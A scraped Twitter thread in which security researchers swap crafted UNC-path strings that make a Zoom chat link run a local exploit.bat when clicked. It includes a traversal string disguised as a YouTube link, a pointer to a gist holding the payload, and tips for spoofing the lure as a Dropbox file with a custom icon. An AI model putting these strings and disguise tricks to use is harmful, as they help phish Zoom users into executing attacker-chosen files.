Haha, that obfuscation trick worked on you, so no doubting
You can try to copy this if twitter doesn't mangle it: http://bit.ly \\?\C:\Users\dade\Downloads\exploit.bat:
-
-
Replying to @taviso @MalwareTechBlog
Yup okay that replicates it. That's sneaky and awesome.
1 reply 0 retweets 6 likes -
1 reply 5 retweets 15 likes
-
Replying to @0xdade @MalwareTechBlog
Okay, how about this one (hxxp to avoid twitter munging, http works in Zoom): \\?\hxxp://youtube.com/watch?v=123124124&title=ZXhwbG9pdAo=\..\..\..\..\Users\dade\Docume~1\exploit.bat I should have been a phisher
4 replies 9 retweets 31 likes -
Replying to @taviso @MalwareTechBlog
This one is really good. Can click anywhere and it triggers, amazing.pic.twitter.com/qxRkdlbTLs
4 replies 5 retweets 22 likes -
-
Payload available here:https://gist.github.com/pwnsdx/4622e18a4ffbb315bc30fbd75e8e97ec …
4 replies 37 retweets 62 likes -
Within confid base64 "type" param can be replaced by dropbox to make it look like it come from Dropbox also thumbnailUrl can also be tweaked to display a custom icon
2 replies 1 retweet 9 likes -
Nice, I bet you can send that over the wire to other participants without the zoommtg link (I didn't test it, but seems plausible).
1 reply 0 retweets 0 likes -
The Zoom link is for you actually
1 reply 0 retweets 1 like
Ah-ha, got it. Nice.
Loading seems to be taking a while.
Twitter may be over capacity or experiencing a momentary hiccup. Try again or visit Twitter Status for more information.
